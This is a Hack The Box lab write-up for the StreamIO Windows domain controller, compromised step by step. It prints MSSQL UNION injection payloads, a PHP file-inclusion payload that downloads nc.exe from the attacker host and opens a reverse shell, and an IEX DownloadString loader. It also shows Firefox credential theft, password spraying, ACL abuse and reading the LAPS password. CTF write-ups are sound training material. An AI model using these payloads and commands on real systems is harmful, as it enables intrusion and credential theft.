[HTB] StreamIO


The StreamIO machine has been created by JDgodd and nikk37. This is a medium Windows Machine with a strong focus on Web applications, Active Directory enumeration and exploitation.

If you didn’t solve this challenge and just look for answers, first, you should take a look at this mind map from Orange Cyberdefense and try again. It could give you some hints about interesting attack paths when dealing with an Active Directory.

image-center

Note: All the actions performed against the target machine have been done with a standard Kali Linux machine. You can download Kali from the official website here.

Reconnaissance

In a penetration test or red team, reconnaissance consists of techniques that involve adversaries actively or passively gathering information that can be used to support targeting.

This information can then be leveraged by an adversary to aid in other phases of the adversary lifecycle, such as using gathered information to plan and execute initial access, to scope and prioritize post-compromise objectives, or to drive and lead further reconnaissance efforts. Here, our only piece of information is an IP address.

Scan with Nmap

Let’s start with a classic service scan with Nmap in order to reveal some of the ports open on the machine.

Note: Always allow a few minutes after the start of an HTB box to make sure that all the services are properly running. If you scan the machine right away, you may miss some ports that should be open.

$ nmap -sV -Pn 10.129.207.221
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-27 15:16 EDT
Nmap scan report for 10.129.207.221
Host is up (0.035s latency).
Not shown: 987 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2023-04-28 02:16:56Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: streamIO.htb0., Site: Default-First-Site-Name)
443/tcp  open  ssl/http      Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: streamIO.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.43 seconds

Remember: By default, Nmap will scans the 1000 most common TCP ports on the targeted host(s). Make sure to read the documentation if you need to scan more ports or change default behaviors.

This computer seems to be a domain controller for streamio.htb and we also have a couple of web-related ports, HTTP (80/TCP) and HTTPS (443/TCP).

HTTP Recon

Let’s check this website, but before that we will add the domain to our /etc/hosts file with the following command:

  • echo "10.129.207.221 streamio.htb" | sudo tee --append /etc/hosts

Then, we can connect to the website https://streamio.htb.

image-center

We can see we also have a login page, but we will check that later. If we check the certificate, we can see another host watch.streamio.htb in the Subject Alt Names (SAN):

image-center

Let’s add this subdomain to our /etc/hosts:

  • echo "10.129.207.221 watch.streamio.htb" | sudo tee --append /etc/hosts

Then, we can go to https://watch.streamio.htb.

image-center

If we run dirbuster, a Web content scanner, with a common word list we can discover the following URL: https://watch.streamio.htb/search.php.

image-center

Let’s see if we can find something on this webpage.

SQL Injection

By looking at the https://watch.streamio.htb/search.php page, we discovered that the search feature contained an SQL injection. An SQL injection (SQLi) is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database.

It can be triggered with the following input 1337' UNION SELECT 1,2,3,4,5,6 -- -.

image-center

We could try to use sqlmap, a testing tool that automates the process of detecting and exploiting SQL injection flaws. However, there is some kind of WAF in front of the application.

image-center

While we could fine-tune the sqlmap parameters, let’s do this manually. First, we need to know which kind of database we are facing. It can be done with the following request 1337' UNION SELECT 1,@@version,3,4,5,6 -- -.

image-center

Okay, it’s MSSQL. Now, after a few custom request, we will be able to gather some password hashes. Here we used the following ones:

/* Get the DB name (STREAMIO) */
1337' UNION SELECT 1,(select DB_NAME()),3,4,5,6-- -
/* Get the tables (movies,users) */
1337' UNION SELECT 1, (SELECT STRING_AGG(name, ',') name FROM STREAMIO..sysobjects WHERE xtype= 'U'),3,4,5,6-- -
/* Get the columns (password, username) */
1337' UNION SELECT 1,name,3,4,5,6 FROM syscolumns WHERE id =(SELECT id FROM sysobjects WHERE name = 'users')-- -
/* Dump the content */
1337' UNION SELECT 1,CONCAT(username, ' ', password),3,4,5,6 FROM users-- -

We obtained the following output:

admin 665a50ac9eaa781e4f7f04199db97a11
Alexendra 1c2b3d8270321140e5153f6637d3ee53
Austin 0049ac57646627b8d7aeaccf8b6a936f
Barbra 3961548825e3e21df5646cafe11c6c76
Barry 54c88b2dbd7b1a84012fabc1a4c73415
Baxter 22ee218331afd081b0dcd8115284bae3
Bruno 2a4e2cf22dd8fcb45adcb91be1e22ae8
Carmon 35394484d89fcfdb3c5e447fe749d213
Clara ef8f3d30a856cf166fb8215aca93e9ff
Diablo ec33265e5fc8c2f1b0c137bb7b3632b5
Garfield 8097cedd612cc37c29db152b6e9edbd3
Gloria 0cfaaaafb559f081df2befbe66686de0
James c660060492d9edcaa8332d89c99c9239
Juliette 6dcd87740abb64edfa36d170f0d5450d
Lauren 08344b85b329d7efd611b7a7743e8a09
Lenord ee0b8a0937abd60c2882eacb2f8dc49f
Lucifer 7df45a9e3de3863807c026ba48e55fb3
Michelle b83439b16f844bd6ffe35c02fe21b3c0
Oliver fd78db29173a5cf701bd69027cb9bf6b
Robert f03b910e2bd0313a23fdd7575f34a694
Robin dc332fb5576e9631c9dae83f194f8e70
Sabrina f87d3c0d6c8fd686aacc6627f1f493a5
Samantha 083ffae904143c4796e464dac33c1f7d
Stan 384463526d288edcc95fc3701e523bc7
Thane 3577c47eb1e12c8ba021611e1280753c
Theodore 925e5408ecb67aea449373d668b7359e
Victor bf55e15b119860a6e6b5a164377da719
Victoria b22abb47a02b52d5dfa27fb0b534f693
William d62be0dc82071bccc1322d64ec5b6c51
yoshihide b779ba15cedfd22a023c4d8bcf5f2332

Using a well-known website, https://crackstation.net, we obtained the following cleartext passwords.

admin:paddpadd
Barry:$hadoW
Bruno:$monique$1991$
Clara:%$clara
Juliette:$3xybitch
Lauren:##123a8j8w5123##
Lenord:physics69i
Michelle:!?Love?!123
Sabrina:!!sabrina$
Thane:highschoolmusical
Victoria:!5psycho8!
yoshihide:66boysandgirls..

Let’s see if one of these accounts is valid.

More Recon

Back to https://streamio.htb, we were able to connect to the website with yoshihide:66boysandgirls... However, we found nothing interesting. Let’s do a bit more recon with gobuster.

$ gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k -u https://streamio.htb
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     https://streamio.htb
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Timeout:                 10s
===============================================================
2023/04/27 16:01:06 Starting gobuster in directory enumeration mode
===============================================================
/images               (Status: 301) [Size: 151] [--> https://streamio.htb/images/]
/Images               (Status: 301) [Size: 151] [--> https://streamio.htb/Images/]
/admin                (Status: 301) [Size: 150] [--> https://streamio.htb/admin/]
/css                  (Status: 301) [Size: 148] [--> https://streamio.htb/css/]
/js                   (Status: 301) [Size: 147] [--> https://streamio.htb/js/]

The https://streamio.htb/admin/ page seems interesting, let’s take a look after login as yoshihide.

image-center

We have a few functionalities available but none of them were really helpful.

Using ffuf, another web fuzzer, we will try to discover hidden functionality. Here we used the following list from the famous SecLists repository:

Note: We used the --fs 1678 flag to avoid getting too many false positive.

Don’t forget to recover the PHPSESSID of yoshihide to run an authenticated scan. This can be done directly in your web browser.

$ ffuf -w burp-parameter-names.txt -u 'https://streamio.htb/admin/?FUZZ=' -b PHPSESSID=ij79jktnjnlbkauguc6t42mmg0 --fs 1678

...[snip]...

[Status: 200, Size: 1712, Words: 90, Lines: 50, Duration: 32ms]
    * FUZZ: debug

[Status: 200, Size: 320235, Words: 15986, Lines: 10791, Duration: 53ms]
    * FUZZ: movie

[Status: 200, Size: 12484, Words: 1784, Lines: 399, Duration: 47ms]
    * FUZZ: staff

[Status: 200, Size: 2073, Words: 146, Lines: 63, Duration: 32ms]
    * FUZZ: user

:: Progress: [6453/6453] :: Job [1/1] :: 1047 req/sec :: Duration: [0:00:06] :: Errors: 0 ::

It seems that we got a debug feature at https://streamio.htb/admin/?debug=.

image-center

After looking around for a while, we were able to get the source code of some pages using a PHP wrapper. Here is an example with index.php which contains the password for the database:

  • https://streamio.htb/admin/?debug=php://filter/convert.base64-encode/resource=index.php
<?php
define('included',true);
session_start();
if(!isset($_SESSION['admin']))
{
    header('HTTP/1.1 403 Forbidden');
    die("<h1>FORBIDDEN</h1>");
}
$connection = array("Database"=>"STREAMIO", "UID" => "db_admin", "PWD" => 'B1@hx31234567890');
$handle = sqlsrv_connect('(local)',$connection);

?>

...[snip]...

It is an interesting finding, but we can’t really go further with this information. Let’s continue to explore the web application.

Remote File Inclusion

Remote File Inclusion (also known as RFI) is the process of including remote files through the exploiting of vulnerable inclusion procedures implemented in the application. This vulnerability occurs, for example, when a page receives, as input, the path to the file that has to be included and this input is not properly sanitized, allowing external URL to be injected.

More Recon

Again, we will use gobuster, this time with the -x php switch to try to discover interesting web pages to read with the debug feature.

$ gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k -u https://streamio.htb/admin/ -x php -c "PHPSESSID=ij79jktnjnlbkauguc6t42mmg0"

===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     https://streamio.htb/admin/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] Cookies:                 PHPSESSID=ij79jktnjnlbkauguc6t42mmg0
[+] User Agent:              gobuster/3.5
[+] Extensions:              php
[+] Timeout:                 10s
===============================================================
2023/04/27 16:19:08 Starting gobuster in directory enumeration mode
===============================================================

...[snip]...

/CSS                  (Status: 301) [Size: 154] [--> https://streamio.htb/admin/CSS/]
/JS                   (Status: 301) [Size: 153] [--> https://streamio.htb/admin/JS/]
/*docroot*            (Status: 400) [Size: 3420]
/*                    (Status: 400) [Size: 3420]
/http%3A%2F%2Fwww     (Status: 400) [Size: 3420]
/Master.php           (Status: 200) [Size: 58]

...[snip]...

Here we have the following web page: https://streamio.htb/admin/master.php

Code Analysis

We can download the code in base64 with the following request:

  • https://streamio.htb/admin/?debug=php://filter/convert.base64-encode/resource=master.php

After decoding the result, we obtained the following code:

...[snip]...

<?php
if(isset($_POST['include']))
{
if($_POST['include'] !== "index.php" ) 
eval(file_get_contents($_POST['include']));
else
echo(" ---- ERROR ---- ");
}
?> 

Here, we have an RFI vulnerability in the file_get_contents() function of the master.php page. We can generate a POST request to /admin/?debug=master.php with the include parameters pointing to our backdoor.

We just need to create a malicious PHP file like:

system("curl 10.10.14.101/nc.exe -o c:\\Windows\\Temp\\nc.exe");
system("c:\\windows\\temp\\nc.exe 10.10.14.101 4321 -e cmd.exe");

Don’t forget to set a listener on the attacking machine with sudo nc -nlvp 4321. Then, using Burp proxy, we can craft a POST request:

image-center

We have a remote shell!

$ sudo nc -nlvp 4321
[sudo] password for ax: 
listening on [any] 4321 ...
connect to [10.10.14.101] from (UNKNOWN) [10.129.207.221] 49727
Microsoft Windows [Version 10.0.17763.2928]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\inetpub\streamio.htb\admin>

Initial Access

In a real-world scenario, adversaries may search network shares on computers they have compromised to find files of interest. Sensitive data can be collected from remote systems via shared network drives. With our current shell, let’s see if we can find something interesting.

Playing with MSSQL

After looking around for a while, we decided to take a look at the database as we previously found DB credentials (db_admin:B1@hx31234567890) in index.php. Note that you should upgrade your shell to PowerShell to avoid any issues when connecting to the DB.

C:\inetpub\streamio.htb\admin>powershell
powershell
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\inetpub\streamio.htb\admin> sqlcmd -S '(local)' -U db_admin -P 'B1@hx31234567890' -Q 'SELECT DB_NAME(); SELECT name FROM master..sysdatabases;'
sqlcmd -S '(local)' -U db_admin -P 'B1@hx31234567890' -Q 'SELECT DB_NAME(); SELECT name FROM master..sysdatabases;'
                                                                                                                                
--------------------------------------------------------------------------------------------------------------------------------
master                                                                                                                          

(1 rows affected)
name                                                                                                                            
--------------------------------------------------------------------------------------------------------------------------------
master                                                                                                                          
tempdb                                                                                                                          
model                                                                                                                           
msdb                                                                                                                            
STREAMIO                                                                                                                        
streamio_backup                                                                                                                 

(6 rows affected)

After listing the databases, we found an interesting one, STREAMIO_BACKUP.

PS C:\inetpub\streamio.htb\admin> sqlcmd -S '(local)' -U db_admin -P 'B1@hx31234567890' -Q 'USE STREAMIO_BACKUP; SELECT username,password FROM users;'
sqlcmd -S '(local)' -U db_admin -P 'B1@hx31234567890' -Q 'USE STREAMIO_BACKUP; select username,password from users;'
Changed database context to 'streamio_backup'.
username                                           password                                          
-------------------------------------------------- --------------------------------------------------
nikk37                                             389d14cb8e4e9b94b137deb1caf0612a                  
yoshihide                                          b779ba15cedfd22a023c4d8bcf5f2332                  
James                                              c660060492d9edcaa8332d89c99c9239                  
Theodore                                           925e5408ecb67aea449373d668b7359e                  
Samantha                                           083ffae904143c4796e464dac33c1f7d                  
Lauren                                             08344b85b329d7efd611b7a7743e8a09                  
William                                            d62be0dc82071bccc1322d64ec5b6c51                  
Sabrina                                            f87d3c0d6c8fd686aacc6627f1f493a5                  

(8 rows affected)

Nice! Again, with https://crackstation.net, we obtained the following plaintext passwords.

image-center

By looking at the discovered users permission, we can see that nikk37 (nikk37:get_dem_girls2@yahoo.com) has remote management privileges.

PS C:\inetpub\streamio.htb\admin> net users nikk37
net users nikk37
User name                    nikk37
Full Name                    
Comment                      
User's comment               
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            2/22/2022 1:57:16 AM
Password expires             Never
Password changeable          2/23/2022 1:57:16 AM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script                 
User profile                 
Home directory               
Last logon                   2/22/2022 2:39:51 AM

Logon hours allowed          All

Local Group Memberships      *Remote Management Use
Global Group memberships     *Domain Users  

Now, with crackmapexec, let’s try to use WinRM (TCP/5985) and see if we effectively have a remote access.

$ crackmapexec winrm streamio.htb -u nikk37 -p 'get_dem_girls2@yahoo.com'
SMB         streamio.htb    5985   DC               [*] Windows 10.0 Build 17763 (name:DC) (domain:streamIO.htb)
HTTP        streamio.htb    5985   DC               [*] http://streamio.htb:5985/wsman
WINRM       streamio.htb    5985   DC               [+] streamIO.htb\nikk37:get_dem_girls2@yahoo.com (Pwn3d!)

Awesome, this time we can use evil-winrm and grab the **first flag.

$ evil-winrm -i streamio.htb -u nikk37 -p 'get_dem_girls2@yahoo.com'

Evil-WinRM shell v3.4

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\nikk37\Documents> ls ..\Desktop


    Directory: C:\Users\nikk37\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        4/27/2023   7:14 PM             34 user.txt

More Recon with winPEAS

Here, with winPEAS, we can scan the machine for information and potential privilege escalation paths.

*Evil-WinRM* PS C:\Users\nikk37\Documents> upload /home/ax/Downloads/winPEASx64.exe
Info: Uploading /home/ax/Downloads/winPEASx64.exe to C:\Users\nikk37\Documents\winPEASx64.exe
                                  
Data: 2702676 bytes of 2702676 bytes copied

Info: Upload successful!

*Evil-WinRM* PS C:\Users\nikk37\Documents> .\winPEASx64.exe

...[snip]...

LAPS Settings
If installed, local administrator password is changed frequently and is restricted by ACL 
    LAPS Enabled: 1
    LAPS Admin Account Name: 
    LAPS Password Complexity: 4
    LAPS Password Length: 14
    LAPS Expiration Protection Enabled: 1

...[snip]...

Looking for Firefox DBs
https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#browsers-history
    Firefox credentials file exists at C:\Users\nikk37\AppData\Roaming\Mozilla\Firefox\Profiles\br53rxeg.default-release\key4.db
Run SharpWeb (https://github.com/djhohnstein/SharpWeb)

...[snip]...

So, LAPS is enabled and we have a Firefox database which may contain credentials. We tried the suggested tool, SharpWeb, but it did not work.

We found another tool to do the job, firepwd, but we need to download some files locally.

*Evil-WinRM* PS C:\Users\nikk37\Documents> cd C:\Users\nikk37\AppData\Roaming\Mozilla\Firefox\Profiles\br53rxeg.default-release\
*Evil-WinRM* PS C:\Users\nikk37\AppData\Roaming\Mozilla\Firefox\Profiles\br53rxeg.default-release> download key4.db
Info: Downloading key4.db to ./key4.db
                                                             
Info: Download successful!

*Evil-WinRM* PS C:\Users\nikk37\AppData\Roaming\Mozilla\Firefox\Profiles\br53rxeg.default-release> download logins.json
Info: Downloading logins.json to ./logins.json
                                                             
Info: Download successful!

*Evil-WinRM* PS C:\Users\nikk37\AppData\Roaming\Mozilla\Firefox\Profiles\br53rxeg.default-release>

Now, we just have to put these file in the same directory as the tool and recover the credentials.

$ python3 firepwd.py

...[snip]...

https://slack.streamio.htb:b'admin',b'JDg0dd1s@d0p3cr3@t0r'
https://slack.streamio.htb:b'nikk37',b'n1kk1sd0p3t00:)'
https://slack.streamio.htb:b'yoshihide',b'paddpadd@12'
https://slack.streamio.htb:b'JDgodd',b'password@12'

Let’s put these credentials in a text file somewhere, we may need them later.

BloodHound

With a valid account, we can also use one of the BloodHound ingestors and gather more information about the Active Directory. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory or Azure environment.

Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Here, we used a Python based ingestor for BloodHound, BloodHound.py.

$ bloodhound-python -c All -u nikk37 -p get_dem_girls2@yahoo.com -d streamIO.htb -ns 10.129.207.221 --zip
INFO: Found AD domain: streamio.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
INFO: Connecting to LDAP server: dc.streamio.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc.streamio.htb
INFO: Found 8 users
INFO: Found 54 groups
INFO: Found 4 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC.streamIO.htb
INFO: Done in 00M 06S
INFO: Compressing output into 20230427164604_bloodhound.zip

By looking at the BloodHound output, we can see that one of the previously recovered account JDgodd have the Owns privileges on CORE STAFF@STREAMIO.HTB and this group can read LAPS passwords!

image-center

However, after trying the JDgodd:password@12 credentials, it did not work…

Privilege Escalation

Privilege Escalation consists of techniques that adversaries use to gain higher-level permissions on a system or network. Adversaries can often enter and explore a network with unprivileged access but require elevated permissions to follow through on their objectives. Common approaches are to take advantage of system weaknesses, misconfigurations, and vulnerabilities.

Password Spraying

As stated by MITRE, adversaries may use a single or small list of commonly used passwords against many different accounts to attempt to acquire valid account credentials. Password spraying uses one password, or a small list of commonly used passwords, that may match the complexity policy of the domain.

Since we have a list of usernames and passwords, we can use CrackMapExec, to see if we can get another account.

$ crackmapexec smb streamio.htb -u users.txt -p pass.txt               

...[snip]...

SMB         streamio.htb    445    DC               [+] streamIO.htb\JDgodd:JDg0dd1s@d0p3cr3@t0r 

Yay! We found valid credentials for JDgodd! Now, we can try to abuse its current privileges to read LAPS password.

Owning the domain

Here, the user JDGODD@STREAMIO.HTB has the ability to modify the owner of the group CORE STAFF@STREAMIO.HTB. It means that we can take over this group and add JDgodd in it.

This can easily be done using PowerView.

*Evil-WinRM* PS C:\Users\nikk37\Documents> IEX(New-Object System.Net.WebClient).DownloadString('http://10.10.14.101/PowerView.ps1')
*Evil-WinRM* PS C:\Users\nikk37\Documents> $SecPassword = ConvertTo-SecureString 'JDg0dd1s@d0p3cr3@t0r' -AsPlainText -Force
*Evil-WinRM* PS C:\Users\nikk37\Documents> $Cred = New-Object System.Management.Automation.PSCredential('streamio.htb\JDgodd', $SecPassword)
*Evil-WinRM* PS C:\Users\nikk37\Documents> Set-DomainObjectOwner -Identity 'CORE STAFF' -OwnerIdentity JDgodd -Cred $cred
*Evil-WinRM* PS C:\Users\nikk37\Documents> Add-DomainObjectAcl -TargetIdentity "CORE STAFF" -PrincipalIdentity JDgodd -Cred $cred -Rights All
*Evil-WinRM* PS C:\Users\nikk37\Documents> Add-DomainGroupMember -Identity 'CORE STAFF' -Members 'JDgodd' -Cred $cred
*Evil-WinRM* PS C:\Users\nikk37\Documents> net group 'CORE STAFF'
Group name     CORE STAFF
Comment

Members

-------------------------------------------------------------------------------
JDgodd
The command completed successfully.

*Evil-WinRM* PS C:\Users\nikk37\Documents> 

Now that we are part of the CORE STAFF@STREAMIO.HTB group, we can use ldapsearch to query the ms-MCS-AdmPwd attribute of the domain controller.

$ ldapsearch -x -b 'DC=streamIO,DC=htb' -H ldap://10.129.207.221 -D JDgodd@streamio.htb -w 'JDg0dd1s@d0p3cr3@t0r' "(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd
# extended LDIF
#
# LDAPv3
# base <DC=streamIO,DC=htb> with scope subtree
# filter: (ms-MCS-AdmPwd=*)
# requesting: ms-MCS-AdmPwd 
#

# DC, Domain Controllers, streamIO.htb
dn: CN=DC,OU=Domain Controllers,DC=streamIO,DC=htb
ms-Mcs-AdmPwd: p-294I{bf,t2a1

Finally, we can connect as administrator on the box and grab the second flag.

$ evil-winrm -i streamio.htb -u administrator -p 'p-294I{bf,t2a1'

Evil-WinRM shell v3.4

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> ls ../Desktop
*Evil-WinRM* PS C:\Users\Administrator\Documents> ls C:\users\martin\desktop


    Directory: C:\users\martin\desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        4/27/2023   7:14 PM             34 root.txt

Awesome! I hope you enjoyed it, I know I did :)